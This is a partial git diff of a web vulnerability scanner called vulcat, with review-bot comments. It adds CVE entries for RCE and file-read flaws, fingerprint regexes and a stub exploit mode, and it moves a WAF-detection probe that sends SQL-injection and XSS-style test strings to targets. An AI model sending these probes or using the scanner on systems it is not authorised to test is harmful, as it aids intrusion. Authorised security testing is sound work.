+| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution |
+| Webmin | CVE-2019-15642 | RCE | POST | Webmin Remote code execution |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
+| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
++----------------------+--------------------+--------------+----------+------------------------------------------------------------+
```
@@ -213,8 +224,9 @@ Options:
Supported target types(Case insensitive):
AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue
- nce,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloa
- k,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou
+ nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,
+ keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w
+ eblogic,webmin,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index f474a5f..86d8fe2 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -5,10 +5,12 @@
from lib.initial.config import config
from lib.tool.logger import logger
-from lib.tool.fingerprint import identify
from lib.tool import check
from lib.report import output
+from lib.plugins.fingerprint.waf import waf
+from lib.plugins.fingerprint.webapp import webapp
+
from payloads.AlibabaDruid import alidruid
from payloads.AlibabaNacos import nacos
from payloads.ApacheAirflow import airflow
@@ -20,6 +22,7 @@
from payloads.AppWeb import appweb
from payloads.AtlassianConfluence import confluence
from payloads.Cisco import cisco
+from payloads.Discuz import discuz
from payloads.Django import django
from payloads.Drupal import drupal
from payloads.ElasticSearch import elasticsearch
@@ -28,6 +31,8 @@
from payloads.Jenkins import jenkins
from payloads.Keycloak import keycloak
# from payloads.Kindeditor import kindeditor
+from payloads.MongoExpress import mongoexpress
+from payloads.Nodejs import nodejs
from payloads.NodeRED import nodered
from payloads.ShowDoc import showdoc
from payloads.Spring import spring
@@ -73,7 +78,7 @@ def start(self):
# * --------------------WAF指纹识别--------------------
if (not self.no_waf):
- waf_info = identify.waf_identify(u) # * WAF指纹识别
+ waf_info = waf.identify(u) # * WAF指纹识别
if waf_info:
while True:
if (not self.batch): # * 是否使用默认选项
@@ -102,8 +107,8 @@ def start(self):
# * --------------------框架指纹识别--------------------
if ((self.application == 'auto') and (not self.vuln)):
logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
- identify.stop = self.stop
- new_app_list = identify.webapp_identify(u)
+ webapp.stop = self.stop
+ new_app_list = webapp.identify(u)
if new_app_list:
logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
self.app_list = new_app_list
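Review bot: `webapp.stop = self.stop` writes scanner state onto the module-level singleton created in webapp.py, so if several `start()` instances run concurrently (the `-t/--thread` option defaults to 2) they all share and overwrite the same `stop` attribute; presumably `identify()` reads it, so passing it explicitly, `new_app_list = webapp.identify(u, stop=self.stop)`, keeps the per-scan value with the call. The same pattern existed before the rename, but the new module boundary is a good place to fix it. `start()` begins and ends outside this hunk.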
@@ -113,7 +118,7 @@ def start(self):
# * --------------------框架指纹识别--------------------
if self.no_poc:
- logger.info('red', '[No-POC] 不进行漏洞扫描')
+ logger.info('red', self.lang['core']['start']['no_poc'])
continue
if check.check_connect(u):
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 4df1ab0..5c8fd94 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -70,7 +70,7 @@ def __init__(self, args):
'Connection': 'close'
}
if args.cookie:
- args.headers['Cookie'] = args.cookie
+ args.headers['Cookie'] = args.cookie.lstrip('Cookie: ')
args.proxies = {
'http': args.http_proxy,
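Review bot: `args.cookie.lstrip('Cookie: ')` does not strip a prefix; `str.lstrip` takes a set of characters, so any cookie string whose leading characters are in {C, o, k, i, e, :, space} is truncated (a value like `id=1` becomes `d=1`, `session=abc` becomes `ssion=abc`) and the wrong Cookie header is sent. Strip the prefix explicitly: `cookie = args.cookie.strip()` / `if cookie.lower().startswith('cookie:'): cookie = cookie[len('cookie:'):].strip()` / `args.headers['Cookie'] = cookie`. The enclosing `__init__` starts and ends outside this hunk.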
@@ -84,13 +84,14 @@ def __init__(self, args):
app_list = [
'alidruid', 'airflow', 'apisix', 'appweb',
'cisco', 'confluence',
- 'django', 'drupal',
+ 'discuz', 'django', 'drupal',
'elasticsearch',
'f5bigip', 'fastjson', 'flink',
'jenkins',
# 'keycloak', 'kindeditor',
'keycloak',
- 'nacos', 'nodered',
+ 'mongoexpress',
+ 'nacos', 'nodered', 'nodejs',
'showdoc', 'solr', 'struts2', 'spring',
'thinkphp', 'tomcat',
'ueditor',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 0de1ce0..d9054e1 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -62,13 +62,14 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
'start': '[INFO] Start scanning target ',
'unable': '[WARN] Unable to connect to ',
- 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://'
+ 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://',
+ 'no_poc': '[No-POC] Disable Vulnerability scanning'
},
'waf_finger': {
'waf': '[INFO] The WAF detection for the current URL starts',
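Review bot: The new English `no_poc` message reads as an instruction rather than a status line, unlike its sibling keys (`[WARN] Unable to connect to`); `'no_poc': '[No-POC] Vulnerability scanning disabled'` states what happened. The Chinese counterpart added in the second hunk of this file already reads as a status. `language()` starts and ends outside this hunk.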
@@ -176,13 +177,14 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
'unable': '[WARN] 无法连接到 ',
- 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头'
+ 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头',
+ 'no_poc': '[No-POC] 不进行漏洞扫描'
},
'waf_finger': {
'waf': '[INFO] 对当前url进行WAF检测, 请稍等...',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 0f08cf5..e9e3709 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -8,18 +8,18 @@ def list():
''' 显示漏洞列表 '''
vul_num = 0
vul_list = ''
- vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
vul_num += 1
vul_list += '| {}|'.format(vul.ljust(21))
- vul_list += ' {}|'.format(info['vul_id'].ljust(17))
+ vul_list += ' {}|'.format(info['vul_id'].ljust(19))
vul_list += ' {}|'.format(info['type'].ljust(13))
vul_list += ' {}|'.format(info['method'].ljust(9))
- vul_list += ' {}\t|'.format(info['description'].ljust(56))
+ vul_list += ' {}\t|'.format(info['description'].ljust(62))
vul_list += '\n'
- vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
print(color.cyan(vul_list + str(vul_num - 1)))
# print(vul_num)
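Review bot: The table separator is now spelled out twice with the same five widths, so the change to `'-'*20` and `'-'*73` had to be made in two places and the widths also have to agree with the `ljust` calls below. Build it once, `sep = '+' + '-'*22 + '+' + '-'*20 + '+' + '-'*14 + '+' + '-'*10 + '+' + '-'*73 + '+\n'`, and use `vul_list += sep` at both the top and the bottom. `list()` continues outside this hunk.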
@@ -170,6 +170,14 @@ def list():
'description': '思科ASA/FTD XSS跨站脚本攻击'
}
],
+ 'Discuz': [
+ {
+ 'vul_id': 'wooyun-2010-080723',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': '全局变量防御绕过RCE'
+ }
+ ],
'Django': [
{
'vul_id': 'CVE-2017-12794',
@@ -203,11 +211,29 @@ def list():
}
],
'Drupal': [
+ {
+ 'vul_id': 'CVE-2014-3704',
+ 'type': 'SQLinject',
+ 'method': 'POST',
+ 'description': 'Drupal < 7.32 Drupalgeddon SQL 注入'
+ },
+ {
+ 'vul_id': 'CVE-2017-6920',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Drupal Core 8 PECL YAML 反序列化代码执行'
+ },
{
'vul_id': 'CVE-2018-7600',
'type': 'RCE',
'method': 'POST',
'description': 'Drupal Drupalgeddon 2 远程代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2018-7602',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Drupal 远程代码执行'
}
],
'ElasticSearch': [
@@ -288,6 +314,28 @@ def list():
# 'description': 'Kindeditor 目录遍历'
# }
# ],
+ 'mongo-express': [
+ {
+ 'vul_id': 'CVE-2019-10758',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': '未授权远程代码执行'
+ }
+ ],
+ 'Nodejs': [
+ {
+ 'vul_id': 'CVE-2017-14849',
+ 'type': 'FileRead',
+ 'method': 'GET',
+ 'description': 'Node.js目录穿越'
+ },
+ {
+ 'vul_id': 'CVE-2021-21315',
+ 'type': 'RCE',
+ 'method': 'GET',
+ 'description': 'Node.js命令执行'
+ }
+ ],
'NodeRED': [
{
'vul_id': 'CVE-2021-3223',
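Review bot: The new key is spelled `'mongo-express'` here while the `-a` value in config.py and the fingerprint name in webapp.py are `'mongoexpress'`, and every other key in this table matches its application name letter for letter (`'NodeRED'`, `'Nodejs'`). If these keys are only rendered by `--list` that is cosmetic; if anything joins them against `app_list`, this entry will never match. A comment such as `# display name; -a value is 'mongoexpress'` would at least make the divergence deliberate.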
@@ -414,6 +462,12 @@ def list():
'type': 'RCE',
'method': 'POST',
'description': 'Webmin Pre-Auth 远程代码执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-15642',
+ 'type': 'RCE',
+ 'method': 'POST',
+ 'description': 'Webmin 远程代码执行'
}
],
'Yonyou': [
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 364a3f2..5bf0348 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -19,7 +19,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.0\n')
+''', version='vulcat.py-1.1.1\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -29,7 +29,7 @@ def parse():
# * 可选参数
optional = parser.add_option_group(lang['optional_help']['title'], lang['optional_help']['name'])
optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread'])
- optional.add_option('--delay', type='int', dest='delay', default=1, help=lang['optional_help']['delay'])
+ optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
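Review bot: `--delay` now parses as `float` but its default is still the int `1`, so `config.get('delay')` is an `int` when the flag is absent and a `float` when present. optparse uses the default as-is; `default=1.0` keeps the type uniform for code that formats or compares it. `parse()` starts and ends outside this hunk.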
@@ -40,6 +40,7 @@ def parse():
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
+ # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令')
# * 第三方api, 例如dnslog/ceye
api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name'])
diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py
new file mode 100644
index 0000000..67d4600
--- /dev/null
+++ b/lib/plugins/Exp.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ 插件:
+ POC转EXP
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+import re
+
+def exp(result):
+ pass
\ No newline at end of file
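Review bot: `exp` is a `pass` stub, yet the module imports nine names it never uses (`dns`, `config`, `md5`/`random_md5`, `logger`, `thread`, `check`, `head`, `requests`, `sleep`, `re`), and importing `lib.initial.config` presumably runs that module's import-time code for nothing. Trim the imports to what the stub needs and add them back with the implementation, and terminate the file with a newline. A docstring on the function, `'''Placeholder: turn a POC result into an EXP run; not implemented yet.'''`, would tell readers the intent without scanning the import list.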
diff --git a/lib/plugins/fingerprint/waf.py b/lib/plugins/fingerprint/waf.py
new file mode 100644
index 0000000..bf009d4
--- /dev/null
+++ b/lib/plugins/fingerprint/waf.py
@@ -0,0 +1,178 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ web应用程序防火墙 指纹识别
+ 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
+'''
+
+from lib.initial.config import config
+from lib.tool.logger import logger
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+import re
+
+class WafIdentify():
+ def identify(self, url):
+ '''
+ waf识别
+ '''
+ try:
+ vul_info = {
+ 'app_name': 'Waf',
+ 'vul_id': 'identify'
+ }
+ path_1 = '?id=1 and 1=1 -- qwe'
+ path_2 = '?id=1\'">//'
+
+ url_1 = url + path_1
+ url_2 = url + path_2
+
+ logger.info('yellow_ex', self.lang['core']['waf_finger']['waf'])
+
+ res = requests.get(
+ url_2,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ res.encoding = 'utf-8'
+ for waf_fp in self.waf_finger:
+ for finger in waf_fp['fingerprint']:
+ # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
+ if (finger in res.text):
+ return waf_fp['name']
+
+ return None
+ except requests.ConnectTimeout:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_timeout'])
+ return None
+ except requests.ConnectionError:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_conn_error'])
+ return None
+ except:
+ logger.info('red_ex', self.lang['core']['waf_finger']['waf_error'])
+ return None
+
+
+ def __init__(self):
+ self.delay = config.get('delay')
+ self.lang = config.get('lang')
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ # * waf指纹库
+ self.waf_finger = [
+ {
+ 'name': '阿里云盾(Aliyun Waf)',
+ 'status_code': 405,
+ 'fingerprint': [
+ '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
+ 'your request has been blocked as it may cause potential threats to the server'
+ ]
+ },
+ {
+ 'name': '腾讯云盾(Tencent WAF)',
+ 'status_code': 403,
+ 'fingerprint': [
+ '腾讯T-Sec Web应用防火墙(WAF)',
+ # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
+ ]
+ },
+ {
+ 'name': '安全狗(SafeDog)',
+ 'status_code': None,
+ 'fingerprint': [
+ '如果您是网站管理员,请登录安全狗',
+ '您的请求带有不合法参数,已被网站管理员设置拦截'
+ ]
+ },
+ {
+ 'name': '华为云盾(HuaWei WAF)',
+ 'status_code': 418,
+ 'fingerprint': [
+ '您的请求疑似攻击行为'
+ ]
+ },
+ {
+ 'name': '网宿云盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您当前的访问行为存在异常,请稍后重试'
+ ]
+ },
+ {
+ 'name': '创宇盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '当前访问疑似黑客攻击,已被创宇盾拦截',
+ '最近有可疑的攻击行为,请稍后重试'
+ ]
+ },
+ {
+ 'name': '玄武盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '您的访问可能对网站造成危险,已被云防护安全拦截'
+ ]
+ },
+ # {
+ # 'name': '360网站卫士',
+ # 'status_code': None,
+ # 'fingerprint': [
+ # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
+ # ]
+ # },
+ # {
+ # 'name': '奇安信网站卫士 ',
+ # 'status_code': 493,
+ # 'fingerprint': [
+ # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
+ # ]
+ # },
+ {
+ 'name': '长亭SafeLine',
+ 'status_code': 403,
+ 'fingerprint': [
+ '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
+ ]
+ },
+ {
+ 'name': 'OpenRASP',
+ 'status_code': 400,
+ 'fingerprint': [
+ 'Request blocked by OpenRASP',
+ '您的请求包含恶意行为,已被服务器拒绝'
+ ]
+ },
+ {
+ 'name': '西部数码云网盾',
+ 'status_code': None,
+ 'fingerprint': [
+ '检测到疑似攻击行为,访问已被云网盾拦截',
+ '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
+ ]
+ },
+ {
+ 'name': '云WAF(waf种类暂时未知)',
+ 'status_code': 461,
+ 'fingerprint': [
+ '请求被WEB防火墙拦截'
+ ]
+ }
+ # {
+ # 'name': '',
+ # 'status_code': 403,
+ # 'fingerprint': [
+ # ''
+ # ]
+ # }
+ ]
+
+waf = WafIdentify()
\ No newline at end of file
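Review bot: The bare `except:` at the end of `identify` also catches `KeyboardInterrupt` and `SystemExit`, so Ctrl-C during the WAF probe is reported as `waf_error` and the scan carries on; `except Exception:` keeps interrupts working. `path_1`/`url_1` are built but never sent, and the `status_code` recorded for each fingerprint is never consulted because the combined check is commented out, so either drop those fields or document them as `# status_code: informational only, not checked`. `url + path_2` also assumes the target has no query string; if `url` already contains `?`, the probe produces a second `?`. `delay`, `sleep`, `re` and `check` are likewise unused in this file.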
diff --git a/lib/tool/fingerprint.py b/lib/plugins/fingerprint/webapp.py
similarity index 72%
rename from lib/tool/fingerprint.py
rename to lib/plugins/fingerprint/webapp.py
index e8751b2..8a92d33 100644
--- a/lib/tool/fingerprint.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -2,9 +2,6 @@
# -*- coding:utf-8 -*-
'''
- web应用程序防火墙 指纹识别
- 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ
-
web应用程序/框架 指纹识别
...
'''
@@ -16,8 +13,8 @@
from time import sleep
import re
-class Identify():
- def webapp_identify(self, url):
+class WebappIdentify():
+ def identify(self, url):
'''
web应用程序/框架识别
'''
@@ -91,52 +88,6 @@ def webapp_identify(self, url):
logger.info('red_ex', self.lang['core']['web_finger']['web_error'])
return None
- def waf_identify(self, url):
- '''
- waf识别
- '''
- try:
- vul_info = {
- 'app_name': 'Waf',
- 'vul_id': 'identify'
- }
- path_1 = '?id=1 and 1=1 -- qwe'
- path_2 = '?id=1\'">//'
-
- url_1 = url + path_1
- url_2 = url + path_2
-
- logger.info('yellow_ex', self.lang['core']['waf_finger']['waf'])
-
- res = requests.get(
- url_2,
- timeout=self.timeout,
- headers=self.headers,
- proxies=self.proxies,
- verify=False,
- allow_redirects=False
- )
- logger.logging(vul_info, res.status_code, res) # * LOG
-
- res.encoding = 'utf-8'
- for waf_fp in self.waf_finger:
- for finger in waf_fp['fingerprint']:
- # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)):
- if (finger in res.text):
- return waf_fp['name']
-
- return None
- except requests.ConnectTimeout:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_timeout'])
- return None
- except requests.ConnectionError:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_conn_error'])
- return None
- except:
- logger.info('red_ex', self.lang['core']['waf_finger']['waf_error'])
- return None
-
-
def __init__(self):
self.delay = config.get('delay')
self.lang = config.get('lang')
@@ -273,6 +224,18 @@ def __init__(self):
# r'' # * 还没有添加指纹
# ]
# },
+ {
+ 'name': 'discuz',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'
Discuz! Board - Powered by Discuz!',
+ r'.*Discuz! Board - Powered by Discuz!',
+ r'Discuz! Board » 首页',
+ r'',
+ r'Powered by Discuz!'
+ ]
+ },
{
'name': 'django',
'path': '',
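Review bot: The `r''` entry in the discuz fingerprint list is an empty pattern, and an empty regex matches every response, so as rendered here every target would be identified as Discuz; if the original line carried an HTML tag that this rendering stripped, the pattern is fine and a comment naming the tag would help, otherwise remove the entry. The `.*` prefix on `r'.*Discuz! Board - Powered by Discuz!'` adds nothing if the matcher is `re.search`, and the first pattern appears split across two lines here, which also looks like rendering loss. `__init__` starts and ends outside this hunk.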
@@ -294,8 +257,11 @@ def __init__(self):
'path': '',
'data': '',
'fingerprint': [
- r'name="Generator" content="Drupal 8 (https://www\.drupal\.org)"',
- r'data-drupal-link-system-path=".*"'
+ r'name="Generator" content="Drupal \d \(http(s)?://(w){0,3}\.?drupal\.org\)"',
+ r'data-drupal-link-system-path=".*"',
+ r'jQuery\.extend\(Drupal\.settings, {"basePath',
+ r'There is a security update available for your version of Drupal\. To ensure the security of your server, you should update immediately! See the',
+ r'Powered by Drupal'
]
},
{
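Review bot: The rewritten Drupal generator pattern uses `\d`, which matches exactly one digit, so a `Drupal 10` generator tag is not recognised, and `(w){0,3}\.?` also accepts `w.drupal.org`. `r'name="Generator" content="Drupal \d+ \(https?://(www\.)?drupal\.org\)"'` covers the versions the old pattern covered plus two-digit ones and keeps the host strict. `__init__` starts and ends outside this hunk.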
@@ -356,6 +322,25 @@ def __init__(self):
# r'KindEditor - WYSIWYG HTML Editor for Internet'
# ]
# },
+ {
+ 'name': 'mongoexpress',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'.* - Mongo Express',
+ r'Mongo Express',
+ r'Mongo Express
'
+ ]
+ },
+ {
+ 'name': 'nodejs',
+ 'path': '/404',
+ 'data': '',
+ 'fingerprint': [
+ r'Cannot GET /.*
'
+ ]
+ },
{
'name': 'nodered',
'path': '',
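Review bot: The nodejs entry sets `'path': '/404'` with a leading slash while the thinkphp entry in this same file uses `'qwe/'` and the others use `''`; if the path is appended to a URL that already ends in `/`, the probe goes to `//404`, so `'path': '404'` matches the existing convention (hedged: the join is outside this hunk). `Cannot GET /...` is the default 404 body of Express's final handler rather than of Node.js itself, which a comment such as `# Express default 404 page ("Cannot GET /path")` should say so the name is read accordingly. The mongoexpress patterns appear split across lines here, which looks like rendering loss rather than a defect.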
@@ -396,12 +381,25 @@ def __init__(self):
r'"timestamp":.*"status":404',
]
},
+ {
+ 'name': 'thinkphp',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'十年磨一剑-为API开发设计的高性能框架',
+ r'十年磨一剑 - 为API开发设计的高性能框架',
+ r':\)',
+ r'ThinkPHP.*V.*'
+ ]
+ },
{
'name': 'thinkphp',
'path': 'qwe/', # * 访问一个不存在的路径时会提示相应信息
'data': '',
'fingerprint': [
r'十年磨一剑-为API开发设计的高性能框架',
+ r'十年磨一剑 - 为API开发设计的高性能框架',
+ r':\)',
r'ThinkPHP.*V.*'
]
},
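Review bot: The new `r':\)'` pattern, added to both thinkphp entries, matches a plain `:)` anywhere in a page body, which any page containing that emoticon will satisfy, so it will produce false positives; either drop it or anchor it to the markup it came from. The hunk also introduces a second entry named `'thinkphp'` whose fingerprints duplicate the existing one, differing only in `path`; a single entry with a list of paths, or a comment stating why two probes are needed, would avoid the duplication. `__init__` starts and ends outside this hunk.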
@@ -447,7 +445,11 @@ def __init__(self):
'data': '',
'fingerprint': [
r'You must enter a username and password to login to the server on\w*',
- r'Login to Webmin'
+ r'Login to Webmin',
+ r'label aria-label="Webmin" data-container="#content"',
+ r'form id="webmin_search_form" action="/webmin_search\.cgi"',
+ r'Webmin Configuration.*Webmin Servers Index.*Webmin Users',
+ r'a href="/webmin/refresh_modules.cgi" class="navigation_module_trigger"'
]
},
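Review bot: The last added Webmin pattern leaves the dot in `refresh_modules.cgi` unescaped while the line above escapes `webmin_search\.cgi`; it still matches, but inconsistently, so use `r'a href="/webmin/refresh_modules\.cgi" class="navigation_module_trigger"'`. `Webmin Configuration.*Webmin Servers Index.*Webmin Users` with unbounded `.*` across a whole page can be slow on large responses; `[^<]*` or a bounded quantifier is cheaper. `__init__` starts and ends outside this hunk.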
{
@@ -481,112 +483,4 @@ def __init__(self):
# }
]
- # * waf指纹库
- self.waf_finger = [
- {
- 'name': '阿里云盾(Aliyun Waf)',
- 'status_code': 405,
- 'fingerprint': [
- '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断',
- 'your request has been blocked as it may cause potential threats to the server'
- ]
- },
- {
- 'name': '腾讯云盾(Tencent WAF)',
- 'status_code': 403,
- 'fingerprint': [
- '腾讯T-Sec Web应用防火墙(WAF)',
- # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断'
- ]
- },
- {
- 'name': '安全狗(SafeDog)',
- 'status_code': None,
- 'fingerprint': [
- '如果您是网站管理员,请登录安全狗',
- '您的请求带有不合法参数,已被网站管理员设置拦截'
- ]
- },
- {
- 'name': '华为云盾(HuaWei WAF)',
- 'status_code': 418,
- 'fingerprint': [
- '您的请求疑似攻击行为'
- ]
- },
- {
- 'name': '网宿云盾',
- 'status_code': None,
- 'fingerprint': [
- '您当前的访问行为存在异常,请稍后重试'
- ]
- },
- {
- 'name': '创宇盾',
- 'status_code': None,
- 'fingerprint': [
- '当前访问疑似黑客攻击,已被创宇盾拦截',
- '最近有可疑的攻击行为,请稍后重试'
- ]
- },
- {
- 'name': '玄武盾',
- 'status_code': None,
- 'fingerprint': [
- '您的访问可能对网站造成危险,已被云防护安全拦截'
- ]
- },
- # {
- # 'name': '360网站卫士',
- # 'status_code': None,
- # 'fingerprint': [
- # '当前访问可能对网站安全造成威胁,已被网站卫士拦截'
- # ]
- # },
- # {
- # 'name': '奇安信网站卫士 ',
- # 'status_code': 493,
- # 'fingerprint': [
- # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截'
- # ]
- # },
- {
- 'name': '长亭SafeLine',
- 'status_code': 403,
- 'fingerprint': [
- '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断'
- ]
- },
- {
- 'name': 'OpenRASP',
- 'status_code': 400,
- 'fingerprint': [
- 'Request blocked by OpenRASP',
- '您的请求包含恶意行为,已被服务器拒绝'
- ]
- },
- {
- 'name': '西部数码云网盾',
- 'status_code': None,
- 'fingerprint': [
- '检测到疑似攻击行为,访问已被云网盾拦截',
- '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单'
- ]
- },
- {
- 'name': '云WAF(waf种类暂时未知)',
- 'status_code': 461,
- 'fingerprint': [
- '请求被WEB防火墙拦截'
- ]
- }
- # {
- # 'name': '',
- # 'status_code': 403,
- # 'fingerprint': [
- # ''
- # ]
- # }
- ]
-
-identify = Identify()
\ No newline at end of file
+webapp = WebappIdentify()
\ No newline at end of file
diff --git a/lib/report/output.py b/lib/report/output.py
index 72dbc39..a0a8b63 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -5,13 +5,20 @@
from lib.initial.config import config
from lib.tool.timed import nowtime_year
from lib.tool.logger import logger
+from thirdparty import requests
+# from lib.plugins.Exp import exp
import json
+import http.client
def output_info(results, lang):
+ # cmd = config.get('command')
+
logger.info('cyan_ex', lang['output']['info']['wait']) # ? 日志, 正在处理扫描结果
results_info_list = []
for result in results:
+ # if (result and cmd):
+ # exp(result)
if result:
results_info = ''
results_info += output_vul_info_color(result)
@@ -67,12 +74,17 @@ def output_json(results, filename, lang):
if result:
f = open(filename, 'a')
- results_info = {
+ result_info = {
'Time': nowtime_year()
}
- results_info.update(result)
+ result_info.update(result)
